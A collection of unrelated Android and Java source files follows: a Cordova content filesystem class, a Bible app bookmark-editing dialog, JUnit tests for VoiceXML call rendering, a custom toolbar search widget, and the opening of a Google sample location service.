public long truncateFileAtURL(LocalFilesystemURL inputURL, long size)
throws NoModificationAllowedException {
throw new NoModificationAllowedException("Couldn't truncate file given its content URI");
}
protected Cursor openCursorForURL(LocalFilesystemURL url) {
ContentResolver contentResolver = this.cordova.getActivity().getContentResolver();
Cursor cursor = contentResolver.query(url.URL, null, null, null, null);
return cursor;
}
protected String filesystemPathForCursor(Cursor cursor) {
final String[] LOCAL_FILE_PROJECTION = { MediaStore.Images.Media.DATA };
int columnIndex = cursor.getColumnIndex(LOCAL_FILE_PROJECTION[0]);
if (columnIndex != -1) {
return cursor.getString(columnIndex);
}
return null;
}
protected Integer resourceSizeForCursor(Cursor cursor) {
int columnIndex = cursor.getColumnIndex(OpenableColumns.SIZE);
if (columnIndex != -1) {
String sizeStr = cursor.getString(columnIndex);
if (sizeStr != null) {
return Integer.parseInt(sizeStr,10);
}
}
return null;
}
protected Integer lastModifiedDateForCursor(Cursor cursor) {
final String[] LOCAL_FILE_PROJECTION = { MediaStore.MediaColumns.DATE_MODIFIED };
int columnIndex = cursor.getColumnIndex(LOCAL_FILE_PROJECTION[0]);
if (columnIndex != -1) {
String dateStr = cursor.getString(columnIndex);
if (dateStr != null) {
return Integer.parseInt(dateStr,10);
}
}
return null;
}
@Override
public String filesystemPathForURL(LocalFilesystemURL url) {
Cursor cursor = openCursorForURL(url);
try {
if (cursor != null && cursor.moveToFirst()) {
return filesystemPathForCursor(cursor);
}
} finally {
if (cursor != null)
cursor.close();
}
return null;
}
@Override
public LocalFilesystemURL URLforFilesystemPath(String path) {
// Returns null as we don't support reverse mapping back to content:// URLs
return null;
}
@Override
public boolean canRemoveFileAtLocalURL(LocalFilesystemURL inputURL) {
String path = filesystemPathForURL(inputURL);
File file = new File(path);
return file.exists();
}
@Override
OutputStream getOutputStreamForURL(LocalFilesystemURL inputURL)
throws IOException {
OutputStream os = resourceApi.openOutputStream(inputURL.URL);
return os;
}
}
|
|
package yuku.alkitab.base.dialog;
import android.app.AlertDialog;
import android.content.Context;
import android.content.DialogInterface;
import android.content.DialogInterface.OnClickListener;
import android.graphics.ColorFilter;
import android.graphics.PorterDuff;
import android.graphics.drawable.Drawable;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.BaseAdapter;
import android.widget.Button;
import android.widget.EditText;
import android.widget.TextView;
import yuku.afw.V;
import yuku.alkitab.base.S;
import yuku.alkitab.base.U;
import yuku.alkitab.base.dialog.LabelEditorDialog.OkListener;
import yuku.alkitab.debug.R;
import yuku.alkitab.model.Label;
import yuku.alkitab.model.Marker;
import yuku.devoxx.flowlayout.FlowLayout;
import java.util.Date;
import java.util.List;
import java.util.SortedSet;
import java.util.TreeSet;
public class TypeBookmarkDialog {
public interface Listener {
/** Called when this dialog is closed with the bookmark modified or deleted */
void onModifiedOrDeleted();
}
final Context context;
final AlertDialog dialog;
FlowLayout panelLabels;
LabelAdapter adapter;
EditText tCaption;
Marker marker;
int ariForNewBookmark;
int verseCountForNewBookmark;
String defaultCaption;
// optional
Listener listener;
// current labels (can be not in the db)
SortedSet<Label> labels = new TreeSet<>();
/**
* Open the bookmark edit dialog, editing existing bookmark.
* @param context Activity context to create dialogs
*/
public static TypeBookmarkDialog EditExisting(Context context, long _id) {
return new TypeBookmarkDialog(context, S.getDb().getMarkerById(_id), null);
}
/**
* Open the bookmark edit dialog for a new bookmark by ari.
*/
public static TypeBookmarkDialog NewBookmark(Context context, int ari, final int verseCount) {
final TypeBookmarkDialog res = new TypeBookmarkDialog(context, null, S.activeVersion.referenceWithVerseCount(ari, verseCount));
res.ariForNewBookmark = ari;
res.verseCountForNewBookmark = verseCount;
return res;
}
private TypeBookmarkDialog(final Context context, final Marker marker, String reference) {
this.context = context;
this.marker = marker;
if (reference == null) {
reference = S.activeVersion.referenceWithVerseCount(marker.ari, marker.verseCount);
}
defaultCaption = reference;
View dialogView = LayoutInflater.from(context).inflate(R.layout.dialog_edit_bookmark, null);
this.panelLabels = V.get(dialogView, R.id.panelLabels);
tCaption = V.get(dialogView, R.id.tCaption);
final Button bAddLabel = V.get(dialogView, R.id.bAddLabel);
bAddLabel.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
adapter = new LabelAdapter();
AlertDialog.Builder b = new AlertDialog.Builder(context)
.setTitle(R.string.add_label_title)
.setAdapter(adapter, bAddLabel_dialog_itemSelected)
.setNegativeButton(R.string.cancel, null);
adapter.setDialogContext(b.getContext());
b.show();
}
});
if (marker != null) {
labels = new TreeSet<>();
final List<Label> ll = S.getDb().listLabelsByMarker(marker);
labels.addAll(ll);
}
setLabelsText();
tCaption.setText(marker != null? marker.caption: reference);
this.dialog = new AlertDialog.Builder(context)
.setView(dialogView)
.setTitle(reference)
.setIcon(R.drawable.ic_attr_bookmark)
.setPositiveButton(R.string.ok, new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
bOk_click();
}
})
.setNegativeButton(R.string.delete, new OnClickListener() {
@Override
public void onClick(final DialogInterface dialog, final int which) {
bDelete_click(marker);
}
})
.create();
}
void bOk_click() {
String caption = tCaption.getText().toString();
// If there is no caption, show reference
if (caption.length() == 0 || caption.trim().length() == 0) {
caption = defaultCaption;
}
final Date now = new Date();
if (marker != null) { // update existing
marker.caption = caption;
marker.modifyTime = now;
S.getDb().insertOrUpdateMarker(marker);
} else { // add new
marker = S.getDb().insertMarker(ariForNewBookmark, Marker.Kind.bookmark, caption, verseCountForNewBookmark, now, now);
}
S.getDb().updateLabels(marker, labels);
if (listener != null) listener.onModifiedOrDeleted();
}
public void show() {
dialog.show();
}
public void setListener(Listener listener) {
this.listener = listener;
}
OnClickListener bAddLabel_dialog_itemSelected = new OnClickListener() {
@Override public void onClick(DialogInterface _unused_, int which) {
if (which == adapter.getCount() - 1) { // new label
LabelEditorDialog.show(context, "", context.getString(R.string.create_label_title), new OkListener() { //$NON-NLS-1$
@Override public void onOk(String title) {
final Label newLabel = S.getDb().insertLabel(title, null);
if (newLabel != null) {
labels.add(newLabel);
setLabelsText();
}
}
});
} else {
final Label label = adapter.getItem(which);
labels.add(label);
setLabelsText();
}
}
};
private View.OnClickListener label_click = new View.OnClickListener() {
@Override public void onClick(View v) {
final Label label = (Label) v.getTag(R.id.TAG_label);
if (label == null) return;
new AlertDialog.Builder(context)
.setMessage(context.getString(R.string.do_you_want_to_remove_the_label_label_from_this_bookmark, label.title))
.setPositiveButton(R.string.ok, new OnClickListener() {
@Override public void onClick(DialogInterface dialog, int which) {
labels.remove(label);
setLabelsText();
}
})
.setNegativeButton(R.string.cancel, null)
.show();
}
};
protected void bDelete_click(final Marker marker) {
if (marker == null) {
return; // bookmark not saved, so no need to confirm
}
new AlertDialog.Builder(context)
.setMessage(R.string.bookmark_delete_confirmation)
.setPositiveButton(R.string.yes, new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
S.getDb().deleteMarkerById(marker._id);
if (listener != null) listener.onModifiedOrDeleted();
}
})
.setNegativeButton(R.string.no, null)
.show();
}
void setLabelsText() {
// remove all first
final int childCount = panelLabels.getChildCount();
if (childCount > 1) {
panelLabels.removeViews(1, childCount - 2);
}
int pos = 1;
for (Label label: labels) {
panelLabels.addView(getLabelView(label), pos++);
}
}
private View getLabelView(Label label) {
TextView res = (TextView) LayoutInflater.from(context).inflate(R.layout.label_x, null);
res.setLayoutParams(panelLabels.generateDefaultLayoutParams());
res.setText(label.title);
res.setTag(R.id.TAG_label, label);
res.setOnClickListener(label_click);
final Drawable drawableRight = res.getCompoundDrawables()[2];
final int labelColor = U.applyLabelColor(label, res);
if (drawableRight != null && labelColor != 0) {
drawableRight.mutate();
drawableRight.setColorFilter(labelColor, PorterDuff.Mode.MULTIPLY);
}
return res;
}
class LabelAdapter extends BaseAdapter {
private List<Label> labels;
private Context dialogContext;
public LabelAdapter() {
labels = S.getDb().listAllLabels();
dialogContext = context;
}
public void setDialogContext(Context dialogContext) {
this.dialogContext = dialogContext;
}
@Override public int getCount() {
return labels.size() + 1;
}
@Override public Label getItem(int position) {
return (position < 0 || position >= labels.size())? null: labels.get(position);
}
@Override public long getItemId(int position) {
return position;
}
@Override public View getView(int position, View convertView, ViewGroup parent) {
int type = getItemViewType(position);
View res = convertView != null? convertView: LayoutInflater.from(dialogContext).inflate(type == 0? R.layout.item_label_chooser: android.R.layout.simple_list_item_1, null);
if (type == 0) {
TextView text1 = V.get(res, android.R.id.text1);
Label label = getItem(position);
text1.setText(label.title);
U.applyLabelColor(label, text1);
} else {
TextView text1 = V.get(res, android.R.id.text1);
text1.setText(context.getString(R.string.create_label_titik3));
}
return res;
}
@Override public int getViewTypeCount() {
return 2;
}
@Override public int getItemViewType(int position) {
if (position == getCount() - 1) return 1;
return 0;
}
}
}
|
|
package com.almende.dialog.adapter;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertNotNull;
import java.net.URLEncoder;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import org.junit.Test;
import org.w3c.dom.Document;
import org.w3c.dom.Node;
import com.almende.dialog.TestFramework;
import com.almende.dialog.accounts.AdapterConfig;
import com.almende.dialog.adapter.VoiceXMLRESTProxy.Return;
import com.almende.dialog.example.agent.TestServlet;
import com.almende.dialog.model.Answer;
import com.almende.dialog.model.MediaProperty;
import com.almende.dialog.model.MediaProperty.MediaPropertyKey;
import com.almende.dialog.model.MediaProperty.MediumType;
import com.almende.dialog.model.Question;
import com.almende.dialog.model.Session;
import com.askfast.commons.entity.AdapterType;
import com.askfast.commons.utils.PhoneNumberUtils;
public class VoiceXMLServletTest extends TestFramework {
protected static final String COMMENT_QUESTION_ID = "1";
protected static final String COMMENT_QUESTION_AUDIO = "http://audio.wav";
protected static final String secondRemoteAddress = "0612345678";
@Test
public void renderCommentQuestionTest() throws Exception {
Question question = getCommentQuestion();
AdapterConfig adapter = createBroadsoftAdapter();
Session session = createSession(adapter, remoteAddressVoice);
String result = renderQuestion(question, adapter, remoteAddressVoice, session);
Document doc = getXMLDocumentBuilder(result);
Node vxml = doc.getFirstChild();
Node form = vxml.getFirstChild();
Node block = form.getFirstChild();
Node prompt = block.getFirstChild();
Node _goto = prompt.getNextSibling();
assertNotNull(doc);
assertEquals(doc.getChildNodes().getLength(), 1);
assertEquals(vxml.getNodeName(), "vxml");
assertEquals(form.getNodeName(), "form");
assertEquals(block.getChildNodes().getLength(), 2);
assertEquals(COMMENT_QUESTION_AUDIO, prompt.getFirstChild()
.getAttributes().getNamedItem("src").getNodeValue());
assertEquals("answer?questionId=" + COMMENT_QUESTION_ID + "&sessionKey=" + session.getKey(),
java.net.URLDecoder.decode(_goto.getAttributes().getNamedItem("next").getNodeValue(), "UTF-8"));
assertXMLGeneratedByTwilioLibrary(String.format("<?xml version=\"1.0\" encoding=\"UTF-8\"?><vxml version=\"2.1\" "
+ "xmlns=\"http://www.w3.org/2001/vxml\"><form><block><prompt><audio src=\"%1$s\"/>"
+ "</prompt><goto next=\"answer?questionId=1&sessionKey=%2$s\"/>"
+ "</block></form></vxml>", COMMENT_QUESTION_AUDIO,
URLEncoder.encode(session.getKey(), "UTF-8")), result);
}
@Test
public void renderReferralQuestionTest() throws Exception {
Question question = getReferralQuestion( false, false, false );
AdapterConfig adapter = createBroadsoftAdapter();
Session session = createSession(adapter, remoteAddressVoice);
String result = renderQuestion( question, adapter, remoteAddressVoice, session );
System.out.println("Res: "+result);
String expected = String.format("<?xml version=\"1.0\" encoding=\"UTF-8\"?><vxml version=\"2.1\" xmlns=\"http://www.w3.org/2001/vxml\">"
+ "<form><transfer name=\"thisCall\" dest=\"tel:%s\" bridge=\"true\" connecttimeout=\"40s\">"
+ "<prompt><audio src=\"http://audio.wav\"/></prompt>"
+ "<filled><if cond=\"thisCall=='unknown'\">"
+ "<goto next=\"answer?questionId=%s&sessionKey=%s&callStatus=completed\"/>"
+ "<else/><goto expr=\"'answer?questionId=%s&sessionKey=%s&callStatus=' + thisCall\"/>"
+ "</if></filled></transfer></form></vxml>",
PhoneNumberUtils.formatNumber( remoteAddressVoice, null ),
COMMENT_QUESTION_ID, URLEncoder.encode(session.getKey(), "UTF-8"),
COMMENT_QUESTION_ID, URLEncoder.encode(session.getKey(), "UTF-8"));
assertXMLGeneratedByTwilioLibrary( expected, result );
}
@Test
public void renderMultiReferralQuestionTest() throws Exception {
Question question = getReferralQuestion( false, false, true );
AdapterConfig adapter = createBroadsoftAdapter();
Session session = createSession(adapter, remoteAddressVoice);
String result = renderQuestion( question, adapter, remoteAddressVoice, session );
System.out.println("Res: "+result);
String expected = String.format("<?xml version=\"1.0\" encoding=\"UTF-8\"?><vxml version=\"2.1\" xmlns=\"http://www.w3.org/2001/vxml\">"
+ "<form><transfer name=\"thisCall\" dest=\"tel:%s\" bridge=\"true\" connecttimeout=\"40s\">"
+ "<prompt><audio src=\"http://audio.wav\"/></prompt>"
+ "<filled><if cond=\"thisCall=='unknown'\">"
+ "<goto next=\"answer?questionId=%s&sessionKey=%s&callStatus=completed\"/>"
+ "<else/><goto expr=\"'answer?questionId=%s&sessionKey=%s&callStatus=' + thisCall\"/>"
+ "</if></filled></transfer></form></vxml>",
PhoneNumberUtils.formatNumber( remoteAddressVoice, null ),
COMMENT_QUESTION_ID, URLEncoder.encode(session.getKey(), "UTF-8"),
COMMENT_QUESTION_ID, URLEncoder.encode(session.getKey(), "UTF-8"));
assertXMLGeneratedByTwilioLibrary( expected, result );
}
@Test
public void renderClosedQuestionTest() {
}
@Test
public void renderOpenQuestionWithTypeDTMFTest() throws Exception {
Question question = getOpenDTMFQuestion();
AdapterConfig adapter = createBroadsoftAdapter();
Session session = createSession(adapter, remoteAddressVoice);
String result = renderQuestion(question, adapter, remoteAddressVoice, session);
assertOpenQuestionWithDTMFType( result );
}
@Test
public void renderOpenQuestionWithTypeAudioTest() throws Exception {
Question question = getOpenAudioQuestion();
AdapterConfig adapter = createBroadsoftAdapter();
Session session = createSession(adapter, remoteAddressVoice);
String result = renderQuestion(question, adapter, remoteAddressVoice, session);
TestServlet.logForTest(AdapterType.CALL.toString(), COMMENT_QUESTION_AUDIO);
String expected = String.format("<?xml version=\"1.0\" encoding=\"UTF-8\"?><vxml version=\"2.1\" xmlns=\"http://www.w3.org/2001/vxml\">"
+ "<form id=\"ComposeMessage\"><record name=\"file\" beep=\"true\" maxtime=\"300s\" dtmfterm=\"true\">"
+ "<prompt timeout=\"5s\"><audio src=\"%1$s\"/></prompt><noinput><prompt><audio src=\"%1$s\"/></prompt>"
+ "</noinput><catch event=\"connection.disconnect.hangup\"><submit next=\"upload?questionId=1&"
+ "amp;sessionKey=%2$s\" namelist=\"file\" method=\"post\" enctype=\"multipart/form-data\"/>"
+ "</catch><filled><submit next=\"upload?questionId=1&sessionKey=%2$s\" namelist=\"file\" "
+ "method=\"post\" enctype=\"multipart/form-data\"/></filled></record></form></vxml>",
COMMENT_QUESTION_AUDIO, URLEncoder.encode(session.getKey(), "UTF-8"));
assertXMLGeneratedByTwilioLibrary(expected, result);
}
/**
* Check if the session that is deleted during hte hangup even is not
* restored in the hangup call
* @throws Exception
*/
@Test
public void sessionRestoreOnHangupTest() throws Exception {
//create an adapter
AdapterConfig adapter = createBroadsoftAdapter();
//create a session
Session session = createSession(adapter, remoteAddressVoice);
VoiceXMLRESTProxy voiceXMLRESTProxy = new VoiceXMLRESTProxy();
voiceXMLRESTProxy.hangup(session);
}
private Question getCommentQuestion() {
Question question = new Question();
question.setQuestion_id(COMMENT_QUESTION_ID);
question.setType("comment");
question.setQuestion_text(COMMENT_QUESTION_AUDIO);
Answer answer = new Answer("http://answer.wav", "/next");
question.setAnswers(new ArrayList<Answer>(Arrays.asList(answer)));
// set the answers in the question
question.generateIds();
return question;
}
private Question getOpenDTMFQuestion() {
Question question = new Question();
question.setQuestion_id(COMMENT_QUESTION_ID);
question.setType( "open" );
question.setQuestion_text(COMMENT_QUESTION_AUDIO);
Answer answer = new Answer("http://answer.wav", "/next");
question.setAnswers(new ArrayList<Answer>(Arrays.asList(answer)));
// set the answers in the question
question.generateIds();
return question;
}
private Question getOpenAudioQuestion() {
Question question = new Question();
question.setQuestion_id(COMMENT_QUESTION_ID);
question.setType( "open" );
question.setQuestion_text(COMMENT_QUESTION_AUDIO);
Answer answer = new Answer("http://answer.wav", "/next");
question.setAnswers(new ArrayList<Answer>(Arrays.asList(answer)));
MediaProperty property = new MediaProperty();
property.setMedium(MediumType.BROADSOFT);
property.addProperty(MediaPropertyKey.TYPE, "AudIO");
question.addMedia_Properties(property);
// set the answers in the question
question.generateIds();
return question;
}
private Question getReferralQuestion( boolean useExternalCallerId, boolean usePreconnect,boolean simultaneousRing ) {
Question question = new Question();
question.setQuestion_id( COMMENT_QUESTION_ID );
question.setType( "referral" );
question.setQuestion_text( COMMENT_QUESTION_AUDIO );
if(simultaneousRing) {
question.setUrl( new ArrayList<String>(Arrays.asList( "tel:" + remoteAddressVoice, "tel:"+secondRemoteAddress)) );
} else {
question.setUrl( "tel:" + remoteAddressVoice );
}
Answer answer1 = new Answer( "http://answer.wav", "/next" );
question.setAnswers( new ArrayList<Answer>( Arrays.asList( answer1 ) ) );
MediaProperty mp = new MediaProperty();
mp.setMedium( MediumType.BROADSOFT );
if ( useExternalCallerId ) {
mp.addProperty( MediaPropertyKey.USE_EXTERNAL_CALLERID, "true" );
}
if ( usePreconnect ) {
mp.addProperty( MediaPropertyKey.USE_PRECONNECT, "true" );
}
question.addMedia_Properties( mp );
// set the answers in the question
question.generateIds();
return question;
}
private String renderQuestion(Question question, AdapterConfig adapter, String remoteID, Session session) throws Exception {
String sessionKey = session != null ? session.getKey() : null;
VoiceXMLRESTProxy servlet = new VoiceXMLRESTProxy();
Return res = servlet.formQuestion(question, adapter.getConfigId(), remoteAddressVoice, null, session);
if (question.getType().equalsIgnoreCase("comment")) {
return servlet.renderComment(res.question, res.prompts, sessionKey);
}
else if (question.getType().equalsIgnoreCase("referral")) {
if (question.getUrl() != null && question.getUrl().size() > 0 && question.getUrl().get(0).startsWith("tel:")) {
return servlet.renderReferralQuestion(question, adapter, remoteID, res, session);
}
}
else if (question.getType().equalsIgnoreCase("open")) {
return servlet.renderOpenQuestion(res.question, res.prompts, sessionKey);
}
else if (question.getType().equalsIgnoreCase("closed")) {
}
return null;
}
/**
* @param result
* @throws Exception
*/
protected HashMap<String,String> assertOpenQuestionWithDTMFType( String result ) throws Exception
{
HashMap<String, String> variablesForAnswer = new HashMap<String, String>();
Document doc = getXMLDocumentBuilder( result );
Node vxml = doc.getFirstChild();
Node answerInputNode = vxml.getChildNodes().item( 0 );
Node questionIdNode = vxml.getChildNodes().item( 1 );
Node sessionKeyNode = vxml.getChildNodes().item( 2 );
Node form = vxml.getChildNodes().item( 3 );
Node field = form.getFirstChild();
assertNotNull( doc );
assertEquals( doc.getChildNodes().getLength(), 1 );
assertEquals( vxml.getNodeName(), "vxml" );
assertEquals( "form", form.getNodeName() );
assertEquals( "answerInput", answerInputNode.getAttributes().getNamedItem( "name" ).getNodeValue() );
assertEquals( "questionId", questionIdNode.getAttributes().getNamedItem( "name" ).getNodeValue() );
assertEquals( "sessionKey", sessionKeyNode.getAttributes().getNamedItem( "name" ).getNodeValue() );
assertEquals( "property", field.getNodeName() );
field = form.getChildNodes().item( 1 );
assertEquals( "form", form.getNodeName() );
assertEquals( "answerInput", answerInputNode.getAttributes().getNamedItem( "name" ).getNodeValue() );
assertEquals( "questionId", questionIdNode.getAttributes().getNamedItem( "name" ).getNodeValue() );
assertEquals( "sessionKey", sessionKeyNode.getAttributes().getNamedItem( "name" ).getNodeValue() );
assertEquals( "field", field.getNodeName() );
assertEquals( 5, field.getChildNodes().getLength() );
if(answerInputNode.getAttributes().getNamedItem( "expr" ) != null)
{
variablesForAnswer.put( "answerInput", answerInputNode.getAttributes().getNamedItem( "expr" ).getNodeValue()
.replace( "'", "" ) );
}
if(questionIdNode.getAttributes().getNamedItem( "expr" ) != null)
{
variablesForAnswer.put( "questionId", questionIdNode.getAttributes().getNamedItem( "expr" ).getNodeValue()
.replace( "'", "" ) );
}
if(sessionKeyNode.getAttributes().getNamedItem( "expr" ) != null)
{
variablesForAnswer.put( "sessionKey", sessionKeyNode.getAttributes().getNamedItem( "expr" ).getNodeValue()
.replace( "'", "" ) );
}
return variablesForAnswer;
}
}
|
|
package com.hkm.advancedtoolbar.V3.layout;
import android.annotation.SuppressLint;
import android.content.Context;
import android.graphics.PorterDuff;
import android.os.Handler;
import android.support.annotation.ColorInt;
import android.support.annotation.ColorRes;
import android.support.annotation.DrawableRes;
import android.support.annotation.Nullable;
import android.support.v4.content.ContextCompat;
import android.support.v7.app.ActionBar;
import android.text.Editable;
import android.text.TextWatcher;
import android.util.Log;
import android.view.KeyEvent;
import android.view.View;
import android.view.animation.Animation;
import android.view.animation.AnimationUtils;
import android.view.inputmethod.EditorInfo;
import android.view.inputmethod.InputMethodManager;
import android.widget.EditText;
import android.widget.ImageView;
import android.widget.RelativeLayout;
import android.widget.TextView;
import com.hkm.advancedtoolbar.R;
/**
* Created by hesk on 16/7/15.
*/
public class SearchCustom<TV extends TextView, EditT extends EditText> implements TextWatcher, TextView.OnEditorActionListener, View.OnClickListener {
private String default_placeholder = "Search on Hypebeast";
private ImageView wrappedSearchCloseBtn, searchMagnifyIcon;
private EditT wrappedEditText;
private commonSearchBarMgr searchListener;
private TV searchTextHint;
private ActionBar control;
private RelativeLayout rl;
private final Runnable fadeInDone = new Runnable() {
@Override
public void run() {
wrappedEditText.setEnabled(true);
wrappedSearchCloseBtn.setEnabled(true);
}
};
private View getview;
private Context mcontext;
public void setCrossColorResId(@ColorRes int color) {
int the_color = ContextCompat.getColor(mcontext, color);
setCrossColor(the_color);
}
public void setCrossColor(@ColorInt int the_color) {
if (wrappedSearchCloseBtn != null && the_color != 0) {
wrappedSearchCloseBtn.setColorFilter(the_color, PorterDuff.Mode.SRC_IN);
}
}
public void setSearchIcon(@DrawableRes int drawable) {
if (searchMagnifyIcon != null && drawable != 0) {
searchMagnifyIcon.setImageResource(drawable);
}
}
public void setSearchArea(@DrawableRes int drawable) {
if (wrappedEditText != null && drawable != 0) {
wrappedEditText.setBackgroundResource(drawable);
}
}
public void setSearchIconColorResId(@ColorRes int color) {
int the_color = ContextCompat.getColor(mcontext, color);
setSearchIconColor(the_color);
}
public void setSearchIconColor(@ColorInt int the_color) {
if (searchMagnifyIcon != null) {
searchMagnifyIcon.setColorFilter(the_color, PorterDuff.Mode.SRC_IN);
}
}
enum behavior {
SHOW_KEYBOARD_BEFORE_ANIMATION,
SHOW_KEYBOARD_AFTER_ANIMATION
}
private behavior keyboard_prioity;
public SearchCustom(View getcustomview) {
getview = getcustomview;
wrappedEditText = (EditT) getcustomview.findViewById(R.id.ios_actionbar_wrapped_search);
wrappedEditText.addTextChangedListener(this);
wrappedEditText.setOnEditorActionListener(this);
wrappedSearchCloseBtn = (ImageView) getcustomview.findViewById(R.id.ios_search_close_btn);
searchMagnifyIcon = (ImageView) getcustomview.findViewById(R.id.ios_find_icon);
wrappedSearchCloseBtn.setOnClickListener(this);
wrappedEditText.setEnabled(false);
wrappedSearchCloseBtn.setEnabled(false);
keyboard_prioity = behavior.SHOW_KEYBOARD_AFTER_ANIMATION;
rl = (RelativeLayout) getcustomview.findViewById(R.id.ios_layout_wrapper);
rl.setAlpha(0f);
rl.animate().alpha(1f).withEndAction(fadeInDone);
revealWithAnimation(false);
mcontext = getcustomview.getContext();
}
@SuppressLint("WrongViewCast")
protected void revealWithAnimation(boolean bool) {
searchTextHint = (TV) getview.findViewById(R.id.ios_hinting);
if (bool) {
final Animation anim = AnimationUtils.loadAnimation(getview.getContext(), R.anim.slidefromright);
anim.setAnimationListener(new Animation.AnimationListener() {
@Override
public void onAnimationStart(Animation animation) {
}
@Override
public void onAnimationEnd(Animation animation) {
showkeyboard();
}
@Override
public void onAnimationRepeat(Animation animation) {
}
});
searchTextHint.setText(default_placeholder);
searchTextHint.startAnimation(anim);
} else {
searchTextHint.setText(default_placeholder);
showkeyboard();
}
}
/**
* Set the search listener to be used on this search
*
* @param searchListener the search listener to be used on this search
*/
public void setOnSearchListener(commonSearchBarMgr searchListener) {
this.searchListener = searchListener;
}
/**
* get the object item in the view
*
* @return the customized edit text field
*/
public EditT getSearchField() {
return wrappedEditText;
}
/**
* @return the current text on the search
*/
public CharSequence getSearchText() {
return wrappedEditText.getText();
}
/**
* Set the search placeholder (hint)
*
* @param placeholder the placeholder
* @see #setSearchPlaceholder(int)
*/
public void setSearchPlaceholder(@Nullable CharSequence placeholder) {
if (placeholder != null)
wrappedEditText.setHint(placeholder);
}
/**
* Set the search placeholder (hint)
*
* @param placeholderRes the placeholder
* @see #setSearchPlaceholder(CharSequence)
*/
public void setSearchPlaceholder(int placeholderRes) {
wrappedEditText.setHint(placeholderRes);
}
protected String getplaccholder() {
return default_placeholder;
}
protected Handler hlr = new Handler();
@Override
public void onTextChanged(CharSequence constraint, int start, int count, int after) {
if (searchListener != null) {
searchListener.onKeySearchLetter(constraint.toString());
return;
}
Log.w(getClass().getName(), "SearchListener == null");
}
@Override
public void onClick(View e) {
if (e.getId() == R.id.ios_search_close_btn) {
if (searchListener != null) {
hidekeyboard();
if (control != null)
control.invalidateOptionsMenu();
searchListener.onRestoreToNormal(control);
}
}
}
public void hidekeyboard() {
hlr.postDelayed(new Runnable() {
@Override
public void run() {
wrappedEditText.setText("");
InputMethodManager m = (InputMethodManager) mcontext.getSystemService(Context.INPUT_METHOD_SERVICE);
m.hideSoftInputFromWindow(wrappedEditText.getWindowToken(), 0);
// imm.toggleSoftInputFromWindow(wrappedEditText.getApplicationWindowToken(), InputMethodManager.SHOW_FORCED, 0);
// imm.showSoftInput(wrappedEditText, 0);
// imm.toggleSoftInput(0, InputMethodManager.HIDE_NOT_ALWAYS);
// wrappedEditText.clearFocus();
}
}, 1);
}
public void showkeyboard() {
hlr.post(new Runnable() {
@Override
public void run() {
InputMethodManager m = (InputMethodManager) mcontext.getSystemService(Context.INPUT_METHOD_SERVICE);
// imm.toggleSoftInputFromWindow(wrappedEditText.getApplicationWindowToken(), InputMethodManager.SHOW_FORCED, 0);
m.toggleSoftInput(InputMethodManager.SHOW_FORCED, 0);
// imm.showSoftInput(wrappedEditText, InputMethodManager.SHOW_IMPLICIT);
// imm.setSoftInputMode(WindowManager.LayoutParams.SOFT_INPUT_STATE_ALWAYS_VISIBLE);
wrappedEditText.requestFocus();
}
});
}
@Override
public void beforeTextChanged(CharSequence constraint, int start, int count, int after) {
}
@Override
public void afterTextChanged(Editable editable) {
if (editable.length() == 0) {
searchTextHint.setText(getplaccholder());
} else {
searchTextHint.setText("");
}
}
@Override
public boolean onEditorAction(TextView textView, int actionId, KeyEvent event) {
if (event != null && event.getAction() != KeyEvent.ACTION_DOWN) {
if (searchListener != null) {
searchListener.onKeySearchLetter(textView.getText().toString());
return true;
}
} else if (actionId == EditorInfo.IME_ACTION_SEARCH
|| event == null
|| event.getKeyCode() == KeyEvent.KEYCODE_ENTER) {
if (searchListener != null) {
InputMethodManager imm = (InputMethodManager) mcontext.getSystemService(Context.INPUT_METHOD_SERVICE);
imm.hideSoftInputFromWindow(textView.getWindowToken(), 0);
searchListener.onKeySearchStartConfirm(textView.getText().toString());
return true;
}
}
Log.w(getClass().getName(), "SearchListener == null");
return false;
}
}
|
|
/*
* Copyright 2015 Google Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.example.android.xyztouristattractions.service;
import android.app.IntentService;
import android.app.Notification;
import android.app.PendingIntent;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.graphics.Bitmap;
import android.location.Location;
import android.support.v4.app.NotificationCompat;
import android.support.v4.app.NotificationManagerCompat;
import android.support.v4.content.LocalBroadcastManager;
import android.util.Log;
import com.bumptech.glide.Glide;
import com.bumptech.glide.load.engine.DiskCacheStrategy;
import com.example.android.xyztouristattractions.R;
import com.example.android.xyztouristattractions.common.Attraction;
import com.example.android.xyztouristattractions.common.Constants;
import com.example.android.xyztouristattractions.common.Utils;
import com.example.android.xyztouristattractions.provider.TouristAttractions;
import com.example.android.xyztouristattractions.ui.DetailActivity;
import com.google.android.gms.common.ConnectionResult;
import com.google.android.gms.common.api.GoogleApiClient;
import com.google.android.gms.location.FusedLocationProviderApi;
import com.google.android.gms.location.Geofence;
import com.google.android.gms.location.GeofencingEvent;
import com.google.android.gms.location.LocationRequest;
import com.google.android.gms.location.LocationServices;
import com.google.android.gms.maps.model.LatLng;
import com.google.android.gms.wearable.DataApi;
import com.google.android.gms.wearable.DataMap;
import com.google.android.gms.wearable.PutDataMapRequest;
import com.google.android.gms.wearable.PutDataRequest;
import com.google.android.gms.wearable.Wearable;
import java.util.ArrayList;
import java.util.Date;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.TimeUnit;
import static com.example.android.xyztouristattractions.provider.TouristAttractions.ATTRACTIONS;
import static com.google.android.gms.location.LocationServices.FusedLocationApi;
import static com.google.android.gms.location.LocationServices.GeofencingApi;
/**
* A utility IntentService, used for a variety of asynchronous background
* operations that do not necessarily need to be tied to a UI.
*/
public class UtilityService extends IntentService {
private static final String TAG = UtilityService.class.getSimpleName();
public static final String ACTION_GEOFENCE_TRIGGERED = "geofence_triggered";
